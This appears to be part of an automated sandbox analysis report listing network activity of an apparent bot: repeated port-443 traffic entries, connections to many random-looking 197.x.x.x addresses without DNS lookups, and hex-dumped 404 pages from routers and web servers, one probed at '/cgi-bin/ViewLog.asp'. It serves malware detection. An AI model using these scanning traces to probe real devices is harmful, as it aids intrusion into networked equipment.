    Source: unknownNetwork traffic detected: HTTP traffic on port 34650 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43150
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53136
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54222
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57982
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56894
    Source: unknownNetwork traffic detected: HTTP traffic on port 40044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36406 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43140
    Source: unknownNetwork traffic detected: HTTP traffic on port 59026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53388
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34664
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37934
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45558
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47736
    Source: unknownNetwork traffic detected: HTTP traffic on port 46074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43130
    Source: unknownNetwork traffic detected: HTTP traffic on port 37962 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58120 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42192 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56666
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37930
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54248
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54250
    Source: unknownNetwork traffic detected: HTTP traffic on port 53122 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60398 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39576 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47728
    Source: unknownNetwork traffic detected: HTTP traffic on port 59714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41188
    Source: unknownNetwork traffic detected: HTTP traffic on port 40604 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45558 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43082
    Source: unknownNetwork traffic detected: HTTP traffic on port 60552 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46608 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37640
    Source: unknownNetwork traffic detected: HTTP traffic on port 59448 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37886
    Source: unknownNetwork traffic detected: HTTP traffic on port 56778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57010
    Source: unknownNetwork traffic detected: HTTP traffic on port 60758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57490
    Source: unknownNetwork traffic detected: HTTP traffic on port 33896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33162 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47432
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45250
    Source: unknownNetwork traffic detected: HTTP traffic on port 34900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44160
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39810
    Source: unknownNetwork traffic detected: HTTP traffic on port 36004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57264
    Source: unknownNetwork traffic detected: HTTP traffic on port 38770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42670 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38266 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46336
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44156
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50878
    Source: unknownNetwork traffic detected: HTTP traffic on port 51492 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34348
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59448
    Source: unknownNetwork traffic detected: HTTP traffic on port 47922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38952
    Source: unknownNetwork traffic detected: HTTP traffic on port 38368 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59254 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58120
    Source: unknownNetwork traffic detected: HTTP traffic on port 44736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39178 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48506
    Source: unknownNetwork traffic detected: HTTP traffic on port 48710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58546 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47412
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44380
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45230
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50884
    Source: unknownNetwork traffic detected: HTTP traffic on port 59780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38094 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58134
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60442
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33252
    Source: unknownNetwork traffic detected: HTTP traffic on port 60128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58614 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48228 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48978
    Source: unknownTCP traffic detected without corresponding DNS query: 197.147.68.87
    Source: unknownTCP traffic detected without corresponding DNS query: 197.116.46.154
    Source: unknownTCP traffic detected without corresponding DNS query: 197.6.126.245
    Source: unknownTCP traffic detected without corresponding DNS query: 197.173.75.36
    Source: unknownTCP traffic detected without corresponding DNS query: 197.171.222.87
    Source: unknownTCP traffic detected without corresponding DNS query: 197.56.37.201
    Source: unknownTCP traffic detected without corresponding DNS query: 197.63.201.206
    Source: unknownTCP traffic detected without corresponding DNS query: 197.159.30.71
    Source: unknownTCP traffic detected without corresponding DNS query: 197.240.253.181
    Source: unknownTCP traffic detected without corresponding DNS query: 197.30.165.156
    Source: unknownTCP traffic detected without corresponding DNS query: 197.26.135.245
    Source: unknownTCP traffic detected without corresponding DNS query: 197.228.53.182
    Source: unknownTCP traffic detected without corresponding DNS query: 197.40.49.5
    Source: unknownTCP traffic detected without corresponding DNS query: 197.99.19.230
    Source: unknownTCP traffic detected without corresponding DNS query: 197.77.128.68
    Source: unknownTCP traffic detected without corresponding DNS query: 197.152.55.230
    Source: unknownTCP traffic detected without corresponding DNS query: 197.231.24.141
    Source: unknownTCP traffic detected without corresponding DNS query: 197.178.103.146
    Source: unknownTCP traffic detected without corresponding DNS query: 197.230.34.85
    Source: unknownTCP traffic detected without corresponding DNS query: 197.122.95.0
    Source: unknownTCP traffic detected without corresponding DNS query: 197.196.13.53
    Source: unknownTCP traffic detected without corresponding DNS query: 197.186.218.16
    Source: unknownTCP traffic detected without corresponding DNS query: 197.217.233.211
    Source: unknownTCP traffic detected without corresponding DNS query: 197.173.67.197
    Source: unknownTCP traffic detected without corresponding DNS query: 197.78.88.49
    Source: unknownTCP traffic detected without corresponding DNS query: 197.84.197.160
    Source: unknownTCP traffic detected without corresponding DNS query: 197.209.173.189
    Source: unknownTCP traffic detected without corresponding DNS query: 197.168.58.10
    Source: unknownTCP traffic detected without corresponding DNS query: 197.134.252.119
    Source: unknownTCP traffic detected without corresponding DNS query: 197.91.124.55
    Source: unknownTCP traffic detected without corresponding DNS query: 197.174.8.68
    Source: unknownTCP traffic detected without corresponding DNS query: 197.118.44.139
    Source: unknownTCP traffic detected without corresponding DNS query: 197.88.151.97
    Source: unknownTCP traffic detected without corresponding DNS query: 197.33.153.74
    Source: unknownTCP traffic detected without corresponding DNS query: 197.134.59.145
    Source: unknownTCP traffic detected without corresponding DNS query: 197.94.159.203
    Source: unknownTCP traffic detected without corresponding DNS query: 197.50.214.184
    Source: unknownTCP traffic detected without corresponding DNS query: 197.248.141.49
    Source: unknownTCP traffic detected without corresponding DNS query: 197.51.27.10
    Source: unknownTCP traffic detected without corresponding DNS query: 197.224.84.111
    Source: unknownTCP traffic detected without corresponding DNS query: 197.128.46.99
    Source: unknownTCP traffic detected without corresponding DNS query: 197.159.238.19
    Source: unknownTCP traffic detected without corresponding DNS query: 197.218.144.7
    Source: unknownTCP traffic detected without corresponding DNS query: 197.177.190.6
    Source: unknownTCP traffic detected without corresponding DNS query: 197.216.164.178
    Source: unknownTCP traffic detected without corresponding DNS query: 197.177.165.10
    Source: unknownTCP traffic detected without corresponding DNS query: 197.207.231.136
    Source: unknownTCP traffic detected without corresponding DNS query: 197.5.209.3
    Source: unknownTCP traffic detected without corresponding DNS query: 197.168.164.22
    Source: unknownTCP traffic detected without corresponding DNS query: 197.201.246.141
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 03:15:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1055Date: Mon, 01 Nov 2021 03:32:06 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 734Date: Mon, 01 Nov 2021 03:16:08 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 31 30 30 20 28 44 65 62 69 61 6e 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=iso-8859-1Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=iso-8859-1Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e
